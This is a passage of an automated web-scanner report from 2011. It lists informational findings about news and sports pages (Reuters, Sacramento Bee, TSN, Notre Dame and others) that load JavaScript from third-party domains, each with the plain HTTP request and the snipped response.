<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.60. http://www.reuters.com/video/2011/09/03/cias-close-links-with-gaddafi-revealed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/09/03/cias-close-links-with-gaddafi-revealed

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/09/03/cias-close-links-with-gaddafi-revealed HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:41 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:41 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.61. http://www.reuters.com/video/2011/09/03/dsk-departs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/video/2011/09/03/dsk-departs

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /video/2011/09/03/dsk-departs HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:44 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:45 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.62. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js
http://init.lingospot.com/ls.js?key=3_Sacbee
http://init.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320
http://init.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300
http://rtq.careerbuilder.com/RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[& mi_cb_search_box &]
http://www.cars.com/includes/js/makemodels-used.js
http://www.cars.com/includes/js/used-car-widget_driver.js

Request

GET /2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: www.sacbee.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 96501
Expires: Sun, 04 Sep 2011 00:57:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:57:44 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div class="lingospot_more_stories_widget">
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320"></script>
...[SNIP]...
<div class="lingospot_around_the_web_widget">
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
<div id='mi_top_job' style="">
<script type='text/javascript' src='http://rtq.careerbuilder.com/RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[& mi_cb_search_box &]'></script>
...[SNIP]...
<div style="background-color: #f9f9f9; padding: 5px; border: 3px solid #efefef; border-top: none;">
       <script language="javascript" type="text/javascript" src="http://www.cars.com/includes/js/used-car-widget_driver.js"></script>
       <script language="javascript" type="text/javascript" src="http://www.cars.com/includes/js/makemodels-used.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">

<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

21.63. http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js
http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js
http://www.cars.com/includes/js/makemodels-used.js
http://www.cars.com/includes/js/used-car-widget_driver.js

Request

GET /classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:27:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<SCRIPT LANGUAGE="JavaScript">

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...


       <script type="text/javascript" src="http://www.cars.com/includes/js/used-car-widget_driver.js"></script>
       <script type="text/javascript" src="http://www.cars.com/includes/js/makemodels-used.js">
       </script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

21.64. http://www.sacbee.com/mr/b.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/mr/b.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320
http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300
http://init.lingospot.com/ls.js?key=3_Sacbee

Request

GET /mr/b.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div style="float:right">
<script src="http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">

<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

21.65. http://www.sacbee.com/mr/e.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/mr/e.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320
http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300
http://init.lingospot.com/ls.js?key=3_Sacbee

Request

GET /mr/e.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div style="float:right">
<script src="http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">

<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

21.66. http://www.sacbee.com/mr/f.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/mr/f.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320
http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300
http://init.lingospot.com/ls.js?key=3_Sacbee

Request

GET /mr/f.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.67. http://www.sacbee.com/reg-bin/int.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/int.cgi

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

21.68. http://www.sacbee.com/reg-bin/tint.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/tint.cgi

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

Request

GET /reg-bin/tint.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds019p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

21.69. https://www.sprint.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

Response

21.70. https://www.sprint.net/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /index.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.71. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://cdn.stumble-upon.com/js/attach_su.js?v=20110819-00
http://cdn.stumble-upon.com/js/plugins_su.js?v=20110819-00

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7352
Date: Sun, 04 Sep 2011 01:27:58 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->


           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110819-00"></script>
...[SNIP]...


   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110819-00"></script>
...[SNIP]...

21.72. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.2/jquery-ui.min.js
http://media.charlotteobserver.com/static/js/jquery-1.2.3.min.js

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="
...[SNIP]...
</script>

<script
type="text/javascript"
src="http://media.charlotteobserver.com/static/js/jquery-1.2.3.min.js"></script>
<script
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.2/jquery-ui.min.js">
</script>
...[SNIP]...

21.73. http://www.tsn.ca/ncaa/story/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tsn.ca
Path:	/ncaa/story/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.ca.doubleclick.net/adj/ctv.tsn.ca/ncaa;mode=;loc=header;adpg=ncaa;adpg2=story;sect=;arena=sports;unit=dhtml;kw=;pos=;dcopt=ist;sz=728x90;tile=1;ord=2011932128270;sops=empty?
http://metrics.ctvdigital.net/comscore/beacon.js
http://metrics.ctvdigital.net/global/globalpagetracking.js
http://watch.tsn.ca/js/OneClip.aspx
http://www2.tsn.ca/scripts/broadband/feature.js
http://www2.tsn.ca/scripts/broadband/ncaa.js
http://www2.tsn.ca/scripts/min/story/foot/131479214.js
http://www2.tsn.ca/scripts/min/story/head/131479214.js

Request

GET /ncaa/story/ HTTP/1.1
Host: www.tsn.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:27 GMT
Connection: close
Content-Length: 24835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head id="ctl00_he
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www2.tsn.ca/styles/min/story/131479214.css" />
<script type="text/javascript" src="http://www2.tsn.ca/scripts/min/story/head/131479214.js"></script>
<script type="text/javascript" src="http://www2.tsn.ca/scripts/broadband/feature.js"></script>
...[SNIP]...
</meta><script type="text/javascript" src="http://www2.tsn.ca/scripts/broadband/ncaa.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.ca.doubleclick.net/adj/ctv.tsn.ca/ncaa;mode=;loc=header;adpg=ncaa;adpg2=story;sect=;arena=sports;unit=dhtml;kw=;pos=;dcopt=ist;sz=728x90;tile=1;ord=2011932128270;sops=empty?"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://metrics.ctvdigital.net/global/globalpagetracking.js"></script>
<script type="text/javascript" src="http://watch.tsn.ca/js/OneClip.aspx" ></script>

<script type="text/javascript" src="http://www2.tsn.ca/scripts/min/story/foot/131479214.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://metrics.ctvdigital.net/comscore/beacon.js"></script>
...[SNIP]...

21.74. http://www.und.com/allaccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.und.com
Path:	/allaccess/

Issue detail

The response dynamically includes the following scripts from other domains:

http://dw.com.com/js/dw.js
http://graphics.fansonly.com/scripts/flash-embed2.js
http://grfx.cstv.com/flash/video/flv_player.js
http://grfx.cstv.com/scripts/common.js
http://grfx.cstv.com/scripts/jcarousel-min.js
http://grfx.cstv.com/scripts/media/v2/video.js?
http://grfx.cstv.com/scripts/oas-omni-controls.js
http://onlyfans.cstv.com/javascript/jquery/jquery.form.236.js
http://onlyfans.cstv.com/javascript/jquery/jquery.url.js
http://onlyfans.cstv.com/javascript/jquery/plugins/jquery.cookies.2.2.0.min.js
http://onlyfans.cstv.com/javascript/jquery/plugins/pager/jquery.pager.js
http://secure-us.imrworldwide.com/v53.js
http://www.google.com/jsapi?key=ABQIAAAAr7dizqcki4xPMbTXwSHFjhTHtoQh9S037PY25KdKZAGgiGmnNxQjSLmM5H3XA0wqcYaXniMgsZyl0g

Request

GET /allaccess/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:56 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<link href="http://grfx.cstv.com/library/css/global-v2-vip.css" rel="stylesheet" type="text/css" />

<script src="http://www.google.com/jsapi?key=ABQIAAAAr7dizqcki4xPMbTXwSHFjhTHtoQh9S037PY25KdKZAGgiGmnNxQjSLmM5H3XA0wqcYaXniMgsZyl0g" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://grfx.cstv.com/scripts/jcarousel-min.js"></script>
<script type="text/javascript" src="http://onlyfans.cstv.com/javascript/jquery/jquery.url.js" ></script>
<script type="text/javascript" src="http://onlyfans.cstv.com/javascript/jquery/jquery.form.236.js" ></script>
<script type="text/javascript" src="http://onlyfans.cstv.com/javascript/jquery/plugins/pager/jquery.pager.js" ></script>
<script type="text/javascript" src="http://onlyfans.cstv.com/javascript/jquery/plugins/jquery.cookies.2.2.0.min.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://grfx.cstv.com/scripts/media/v2/video.js?"></script>
...[SNIP]...
<div id="flash-video">
<script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

21.75. http://www.und.com/sports/m-footbl/9873956 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The response dynamically includes the following scripts from other domains:

http://dw.com.com/js/dw.js
http://graphics.fansonly.com/scripts/flash-embed2.js
http://grfx.cstv.com/flash/video/flv_player.js
http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js
http://grfx.cstv.com/scripts/common.js
http://grfx.cstv.com/scripts/oas-omni-controls.js
http://secure-us.imrworldwide.com/v53.js

Request

GET /sports/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:59 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

21.76. http://www.und.com/sports/m-footbl/9874134 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

The response dynamically includes the following scripts from other domains:

http://dw.com.com/js/dw.js
http://graphics.fansonly.com/scripts/flash-embed2.js
http://grfx.cstv.com/flash/video/flv_player.js
http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js
http://grfx.cstv.com/scripts/common.js
http://grfx.cstv.com/scripts/oas-omni-controls.js
http://secure-us.imrworldwide.com/v53.js

Request

GET /sports/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
